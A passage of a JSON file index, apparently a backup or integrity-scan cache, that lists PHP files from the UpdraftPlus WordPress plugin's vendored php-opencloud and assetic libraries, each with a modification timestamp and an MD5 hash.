lib\\/OpenCloud\\/Common\\/Exceptions\\/UnsupportedExtensionError.php\":{\"d\":1545638163,\"h\":\"e766b35e8ccc3b2e2314b478ac21cb6e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InvalidParameterError.php\":{\"d\":1545638163,\"h\":\"1ad7614afe9379bc94f8e1ff8d4e5f85\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/HttpUnauthorizedError.php\":{\"d\":1545638163,\"h\":\"042f8382b1ec91fbf67bdc8783414b26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/MetadataKeyError.php\":{\"d\":1545638163,\"h\":\"71476c9358b08cde08f1d9e51ab3704a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/ImageError.php\":{\"d\":1545638163,\"h\":\"aa20c80d566af7fec9d488bbcd5161ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/HttpForbiddenError.php\":{\"d\":1545638163,\"h\":\"07271e8a945d7b78a74eed077d93fc1f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/ResourceNotFoundException.php\":{\"d\":1545638163,\"h\":\"c7c4854bac07bf3fdec6e286965c6296\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/TempUrlMethodError.php\":{\"d\":1545638163,\"h\":\"32c145f88821451073ef476514a43f5f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/EndpointError.php\":{\"d\":1545638163,\"h\":\"2b250244bc15563d0d80a2bc7e0d954c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/CollectionException.php\":{\"d\":1545638163,\"h\":\"6242217ef78dff17fc2dc886fd14d9ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/IdRequiredError.php\":{\"d\":1545638163,\"h\":\"84076e2cfe280482f8fbfd14ba81ac4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InstanceError.php\":{\"d\":1545638163,\"h\":\"b2ba6b8c746883d32a2d788a38ceeb85\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/HttpError.php\":{\"d\":1545638163,\"h\":\"505e5a46d37b9e82ac94745fc64b91a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/LoggingException.php\":{\"d\":1545638163,\"h\":\"d49ce02d922bcaeb47824a83a4e59eb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/BaseException.php\":{\"d\":1545638163,\"h\":\"ffab2475ad39249b686f790c2513f7a3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/HttpResponseException.php\":{\"d\":1545638163,\"h\":\"2195e096d7c485982c5c9b6b1e547710\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/DeleteError.php\":{\"d\":1545638163,\"h\":\"291ff47a3c612030788122a6f108cc0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/ObjectCopyError.php\":{\"d\":1545638163,\"h\":\"948cde0802113807d1ffa5a2297764fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/UserNameError.php\":{\"d\":1545638163,\"h\":\"4688a8ac5119bdaf3a91b313edb35814\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/MetadataJsonError.php\":{\"d\":1545638163,\"h\":\"a0af1abc31a9ee9f1b4d0967bdd58e0d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/NoNameError.php\":{\"d\":1545638163,\"h\":\"5d119e865cb8f742b87b0ca630b547c3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InvalidTemplateError.php\":{\"d\":1545638163,\"h\":\"1f080a03a0cda34dc4b03937d679a03b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/JsonError.php\":{\"d\":1545638163,\"h\":\"4b376868822e83138e3a6bc30c130eaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InstanceNotFound.php\":{\"d\":1545638163,\"h\":\"42cc5a90f697a7ddd3f649935ef28382\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/MetadataCreateError.php\":{\"d\":1545638163,\"h\":\"26100fd9ce0074ba03d1c700436e67cc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InstanceFlavorError.php\":{\"d\":1545638163,\"h\":\"ad05b8362bbb3549d1e7878b56705bcd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/ServerActionError.php\":{\"d\":1545638163,\"h\":\"70f952b3293b1a11a360c5d8b2798238\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/NoContentTypeError.php\":{\"d\":1545638163,\"h\":\"92805602692e28cb29f8a0c976e33495\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InvalidIpTypeError.php\":{\"d\":1545638163,\"h\":\"08572b5ea7ff3fc59ae6d0a6c5742286\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InstanceUpdateError.php\":{\"d\":1545638163,\"h\":\"6187890a33702ae67ef70acc653d0da8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/MisMatchedChecksumError.php\":{\"d\":1545638163,\"h\":\"0ce9901837e04a733fedbbef4bba088d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/ObjFetchError.php\":{\"d\":1545638163,\"h\":\"6ce4e3881eaa11ba7b41be0b87132846\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/AsyncTimeoutError.php\":{\"d\":1545638163,\"h\":\"dcf0df9d450143fc4d8a8902a84960fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/HttpOverLimitError.php\":{\"d\":1545638163,\"h\":\"700f926dbb2f645ef4b00d4a8a4ed86f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/InvalidRequestError.php\":{\"d\":1545638163,\"h\":\"614de75a58e90509db02070cfb824ba8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Exceptions\\/ServerIpsError.php\":{\"d\":1545638163,\"h\":\"3b8352635012a9d1c61b1aff9bfd4dca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/ArrayAccess.php\":{\"d\":1545638163,\"h\":\"b3777c5a9785ce5495731c3e59d5a0e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Metadata.php\":{\"d\":1545638163,\"h\":\"45d75274b0a948409b47eb7156561a63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Collection.php\":{\"d\":1545638163,\"h\":\"38adf5802ef6c2fe4c4cc314e6705e0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Base.php\":{\"d\":1545638163,\"h\":\"2de850fdb156fab6e03d976ce04159ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/Lang.php\":{\"d\":1545638163,\"h\":\"d90ae34b15068454bac7e51ee81f71c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Common\\/PersistentObject.php\":{\"d\":1545638163,\"h\":\"a44e28fddddaa286b50faff05036ca9a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Version.php\":{\"d\":1545638163,\"h\":\"57c3a54890adf6877802e8a7c185f8e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/Rackspace.php\":{\"d\":1545638163,\"h\":\"80b0c6c2ff1fcd92230dd963d74e9187\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/OpenCloud\\/OpenStack.php\":{\"d\":1545638163,\"h\":\"4a3cfeaad81bd3a773cbfd76b34ca825\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/lib\\/php-opencloud.php\":{\"d\":1545638163,\"h\":\"83bf8c89c4b5e3d69c500f8dfab4fc62\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/README.md\":{\"d\":1545638163,\"h\":\"a3de3f693507b33a8cdd2ea63858a5f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/LICENSE\":{\"d\":1545638163,\"h\":\"8b5bccf4a7641d19e4ac63d3aed82403\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/CONTRIBUTING.md\":{\"d\":1545638163,\"h\":\"0e62009b75ea57ec4424b62c62455736\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/composer.json\":{\"d\":1545638163,\"h\":\"e13d168cf32fdfc0498aa56bbc166992\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/apigen.neon\":{\"d\":1545638163,\"h\":\"fa187396127da3f458657b2e1e39c55c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/rackspace\\/php-opencloud\\/phpunit.xml.dist\":{\"d\":1545638163,\"h\":\"dfbf1a7c7bb96a1899d0173ade73e536\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Exception\\/Exception.php\":{\"d\":1545638163,\"h\":\"a8633ee6a0236c500245feffd3eb3a3a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Exception\\/FilterException.php\":{\"d\":1545638163,\"h\":\"aeb27e938883e626f3837b87fda7f851\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/GoogleClosure\\/BaseCompilerFilter.php\":{\"d\":1545638163,\"h\":\"839d176315bfbed1383bd7c3a7297561\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/GoogleClosure\\/CompilerApiFilter.php\":{\"d\":1545638163,\"h\":\"4437720074d6a74853f51cdd4b947c6d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/GoogleClosure\\/CompilerJarFilter.php\":{\"d\":1545638163,\"h\":\"2eefedf925dd385203b1ad619859cd8c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/Sass\\/SassFilter.php\":{\"d\":1545638163,\"h\":\"663ae9550bf563a58cf1948f6cf50a11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/Sass\\/ScssFilter.php\":{\"d\":1545638163,\"h\":\"b92672d4b65c59ec8a9ed945f332de4e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/Sass\\/BaseSassFilter.php\":{\"d\":1545638163,\"h\":\"d6ab3a0ee7a65b6dbcf63f2150033f70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/Yui\\/CssCompressorFilter.php\":{\"d\":1545638163,\"h\":\"f88a74830ff5ed4105bdfb64131948f7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/Yui\\/BaseCompressorFilter.php\":{\"d\":1545638163,\"h\":\"36c0093bfb08de6354fb8f17596998e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/Yui\\/JsCompressorFilter.php\":{\"d\":1545638163,\"h\":\"ea619df1cfd170ca0892255e952296dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/LessFilter.php\":{\"d\":1545638163,\"h\":\"69e826afdc78b1294fda14564056f500\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/JSMinFilter.php\":{\"d\":1545638163,\"h\":\"35cf23091e6644ececc2ecfd2b0b475a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/BaseNodeFilter.php\":{\"d\":1545638163,\"h\":\"15af5f438d9885b5a376844c534e1250\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/LessphpFilter.php\":{\"d\":1545638163,\"h\":\"799cb3c5447946901dc63fbd4b3e0a30\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/PackagerFilter.php\":{\"d\":1545638163,\"h\":\"022b27f9fb3fe03da45f003c05b8db79\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/AutoprefixerFilter.php\":{\"d\":1545638163,\"h\":\"0086e238db3ae852b198120ff1272953\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/ScssphpFilter.php\":{\"d\":1545638163,\"h\":\"1be71f7974031f0ae98a1864664ea8ad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/FilterInterface.php\":{\"d\":1545638163,\"h\":\"a489ed80dc7efc933a31486fd620036f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CoffeeScriptFilter.php\":{\"d\":1545638163,\"h\":\"25512d066ae50dd16e7ff58845e51e97\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CallablesFilter.php\":{\"d\":1545638163,\"h\":\"23a420acd72edef1f5e956f0d76b1eb9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/SprocketsFilter.php\":{\"d\":1545638163,\"h\":\"ff20454994723001200fecb2afde39e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/FilterCollection.php\":{\"d\":1545638163,\"h\":\"40c2614ea982877e519daec0a25b7f37\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/HandlebarsFilter.php\":{\"d\":1545638163,\"h\":\"95ebe66ad95ca5c8720af4221546aac9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/PackerFilter.php\":{\"d\":1545638163,\"h\":\"166d84f1a47ae37a3d66cc0ef8414813\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/OptiPngFilter.php\":{\"d\":1545638163,\"h\":\"6dcceca9d467e08257ad85ce8a9345ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/JpegoptimFilter.php\":{\"d\":1545638163,\"h\":\"63dc2db9bbd80c226753109ba0726090\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/PhpCssEmbedFilter.php\":{\"d\":1545638163,\"h\":\"838d4092952d167dcc43339b2ca637f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/JpegtranFilter.php\":{\"d\":1545638163,\"h\":\"d70b5f3707175cf1e9261bad40e4c60a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CssRewriteFilter.php\":{\"d\":1545638163,\"h\":\"5086b0e2fa8d558024f905b2deb36952\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/BaseCssFilter.php\":{\"d\":1545638163,\"h\":\"91337a0f7e6969d2a0e807476791367c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/MinifyCssCompressorFilter.php\":{\"d\":1545638163,\"h\":\"49f02aad474b6e3e0ff1f864dcb6f41f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/HashableInterface.php\":{\"d\":1545638163,\"h\":\"5a61de3c0308c3a35f9aac5713a15358\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/PngoutFilter.php\":{\"d\":1545638163,\"h\":\"183c0c7111f49d6228d44391f9baf7aa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CssImportFilter.php\":{\"d\":1545638163,\"h\":\"9276c49c174c7dbef9c080bb05386f38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/BaseProcessFilter.php\":{\"d\":1545638163,\"h\":\"c526ed3a285d7523a54fd161aae74926\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/DependencyExtractorInterface.php\":{\"d\":1545638163,\"h\":\"c6ba8eba5c303f42c30bf475b0f6631e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/RooleFilter.php\":{\"d\":1545638163,\"h\":\"2fff30dbbf66b22761af85e50a7cc921\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CssCacheBustingFilter.php\":{\"d\":1545638163,\"h\":\"1adb2994b36770d67833fa278289e33f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/SeparatorFilter.php\":{\"d\":1545638163,\"h\":\"886be4c9bdea46d15ba89dd3c2b1d77f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CompassFilter.php\":{\"d\":1545638163,\"h\":\"bc6e80f6f10c5c8f469627e0938a83da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/UglifyJs2Filter.php\":{\"d\":1545638163,\"h\":\"010d1b1831b082051e5f26a7892dd55e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/DartFilter.php\":{\"d\":1545638163,\"h\":\"9ea44dd07ee60523915d1f45986ba7e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/GssFilter.php\":{\"d\":1545638163,\"h\":\"bfb10dd39cc77686a01207e967308295\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/UglifyJsFilter.php\":{\"d\":1545638163,\"h\":\"6676c86a3df86de14a4670131a638c1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/TypeScriptFilter.php\":{\"d\":1545638163,\"h\":\"bbfad77ee1f1d33ed51f4c072f2a3c9d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/CssEmbedFilter.php\":{\"d\":1545638163,\"h\":\"45e057918695e845f5b258248f7045cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/SassphpFilter.php\":{\"d\":1545638163,\"h\":\"07a01250c59ea86a1e3658df88118e76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/updraftplus\\/vendor\\/kriswallsmith\\/assetic\\/src\\/Assetic\\/Filter\\/ReactJsxFilter.php\":{\"d\":1545638163,\"h\":\"3835f3dc5962e6ec7bc0665bae5715cc\"